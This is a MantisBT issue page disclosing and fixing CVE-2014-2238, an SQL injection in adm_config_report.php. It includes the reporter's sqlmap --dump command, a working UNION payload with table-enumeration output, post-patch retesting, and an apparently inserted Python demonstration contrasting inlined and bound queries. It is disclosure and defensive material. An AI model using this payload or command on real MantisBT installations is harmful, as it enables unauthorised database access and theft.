View Issue Details

ID: 0017055
Project: mantisbt
Category: security
View Status: public
Last Update: 2014-03-03 14:24
Reporter: HauntIT
Assigned To: dregad
Priority: immediate
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.2.13
Target Version: 1.2.17
Fixed in Version: 1.2.17
Summary: 0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
Description

Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in the manage configuration page.

Additional Information

k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" --cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; utma=65758510.2100553510.1393586134.1393586134.1393586134.1; utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:19:12

[15:19:12] [INFO] testing connection to the target URL
[15:19:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie h
[15:19:16] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[15:19:17] [INFO] testing if POST parameter 'save' is dynamic
[15:19:17] [WARNING] POST parameter 'save' does not appear dynamic
(...)
[15:20:32] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:22:22] [INFO] testing 'Generic UNION query (11) - 1 to 10 columns'
[15:22:25] [INFO] target URL appears to be UNION injectable with 7 columns
[15:22:32] [INFO] POST parameter 'filter_config_id' is 'Generic UNION query (11) - 1 to 10 columns' injectable
POST parameter 'filter_config_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
(...)

[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
sqlmap identified the following injection points with a total of 815 HTTP(s) requests:

Place: POST
Parameter: filter_config_id
Type: UNION query
Title: Generic UNION query (11) - 6 columns
Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-4074' UNION ALL SELECT 11,CONCAT(0x716b737471,0x737a4e7050735579665a,0x71706b6d71),11,11,11,11-- &apply_filter_button=Apply Filter

[15:23:13] [INFO] testing MySQL
[15:23:14] [INFO] confirming MySQL
[15:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:23:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:23:14] [INFO] fetching current database
[15:23:14] [INFO] fetching tables for database: 'bugtracker'
[15:23:14] [INFO] the SQL query used returns 31 entries
[15:23:15] [INFO] retrieved: "mantis_bug_file_table"
[15:23:15] [INFO] retrieved: "mantis_bug_history_table"
[15:23:15] [INFO] retrieved: "mantis_bug_monitor_table"
[15:23:15] [INFO] retrieved: "mantis_bug_relationship_table"
[15:23:15] [INFO] retrieved: "mantis_bug_revision_table"
[15:23:15] [INFO] retrieved: "mantis_bug_table"
[15:23:16] [INFO] retrieved: "mantis_bug_tag_table"
[15:23:16] [INFO] retrieved: "mantis_bug_text_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_text_table"
[15:23:16] [INFO] retrieved: "mantis_category_table"
(...)

Tags: No tags attached.

Relationships

Activities

dregad

2014-02-28 12:11

developer   ~0039585

Last edited: 2014-02-28 12:12

I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param().

Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de

dregad

2014-02-28 12:33

developer   ~0039586

sqlmap test after patching:

[*] starting at 18:32:39

[18:32:39] [INFO] testing connection to the target URL
[18:32:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:32:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] 
[18:32:41] [INFO] skipping POST parameter 'save'
[18:32:41] [INFO] skipping POST parameter 'filter_user_id'
[18:32:41] [INFO] skipping POST parameter 'filter_project_id'
[18:32:41] [INFO] testing if POST parameter 'filter_config_id' is dynamic
[18:32:41] [INFO] confirming that POST parameter 'filter_config_id' is dynamic
[18:32:42] [INFO] POST parameter 'filter_config_id' is dynamic
[18:32:42] [WARNING] heuristic (basic) test shows that POST parameter 'filter_config_id' might not be injectable
[18:32:42] [INFO] testing for SQL injection on POST parameter 'filter_config_id'
[18:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:32:44] [INFO] testing 'MySQL inline queries'
[18:32:44] [WARNING] reflective value(s) found and filtering out
[18:32:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:32:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:32:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:59] [WARNING] POST parameter 'filter_config_id' is not injectable
[18:32:59] [INFO] skipping POST parameter 'apply_filter_button'
[18:32:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 18:32:59

dregad

2014-02-28 15:03

developer   ~0039587

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241

Related Changesets

MantisBT: master-1.2.x a608f2d0

2014-02-28 12:23:14

dregad

Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php

MantisBT: master e8bdd248

2014-02-28 12:23:14

dregad

Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php

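To show the root cause that dregad's note and both changeset messages describe (an inlined filter value versus a db_param() placeholder with a separately bound value), here is an added Python example; it is not MantisBT code. It assumes SQLite standing in for MySQL, a constructed mantis_config_table with the real table's six columns, a constructed mantis_user_table, and sqlmap's UNION payload from the report adapted to SQLite syntax.

```python
import sqlite3

# Constructed stand-in for mantis_config_table (same six columns as the real
# table; the rows are made up). A second constructed table holds data the
# config report should never be able to expose.
SCHEMA = """
CREATE TABLE mantis_config_table (
    config_id TEXT, project_id INTEGER, user_id INTEGER,
    access_reqd INTEGER, type INTEGER, value TEXT);
INSERT INTO mantis_config_table VALUES ('allow_signup', 0, 0, 90, 1, '1');
INSERT INTO mantis_config_table VALUES ('webmaster_email', 0, 0, 90, 0, 'webmaster@example.com');
CREATE TABLE mantis_user_table (id INTEGER, username TEXT);
INSERT INTO mantis_user_table VALUES (1, 'administrator');
INSERT INTO mantis_user_table VALUES (2, 'jsmith');
"""

# The UNION payload sqlmap reported, with MySQL's CONCAT() replaced by a plain
# column so it parses in SQLite. Six columns, matching the SELECT below just as
# sqlmap's six-column payload matched the original query.
SQLMAP_STYLE_PAYLOAD = (
    "-4074' UNION ALL SELECT 11,username,11,11,11,11 FROM mantis_user_table-- "
)

COLUMNS = "config_id, project_id, user_id, access_reqd, type, value"


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def filter_config_inlined(con, filter_config_id):
    """Before the fix: the filter value is spliced into the SQL text, so the
    quote in the payload ends the literal and the rest becomes SQL."""
    sql = (f"SELECT {COLUMNS} FROM mantis_config_table "
           f"WHERE config_id = '{filter_config_id}'")
    return con.execute(sql).fetchall()


def filter_config_bound(con, filter_config_id):
    """After the fix: a placeholder (what db_param() emits) and the value passed
    separately to the driver, so the payload is compared as a plain string."""
    sql = f"SELECT {COLUMNS} FROM mantis_config_table WHERE config_id = ?"
    return con.execute(sql, (filter_config_id,)).fetchall()


def leaked_usernames(rows):
    """Second column of every row that did not come from the config table
    (the UNION branch fills config_id with the literal 11)."""
    return sorted(r[1] for r in rows if r[0] == 11)
```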
Issue History

Date Modified Username Field Change
2014-02-28 11:00 dregad New Issue
2014-02-28 11:01 dregad Reporter dregad => HauntIT
2014-02-28 12:11 dregad Note Added: 0039585
2014-02-28 12:11 dregad Status new => confirmed
2014-02-28 12:11 dregad Product Version 1.2.16 => 1.2.13
2014-02-28 12:12 dregad Note Edited: 0039585 View Revisions
2014-02-28 12:31 dregad Changeset attached => MantisBT master-1.2.x a608f2d0
2014-02-28 12:31 dregad Assigned To => dregad
2014-02-28 12:31 dregad Status confirmed => resolved
2014-02-28 12:31 dregad Resolution open => fixed
2014-02-28 12:31 dregad Fixed in Version => 1.2.17
2014-02-28 12:31 dregad Changeset attached => MantisBT master e8bdd248
2014-02-28 12:33 dregad Note Added: 0039586
2014-02-28 12:35 dregad View Status private => public
2014-02-28 15:03 dregad Note Added: 0039587
2014-02-28 15:35 dregad Summary SQL injection vulnerability in adm_config_report.php => CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
2014-03-03 14:24 dregad Status resolved => closed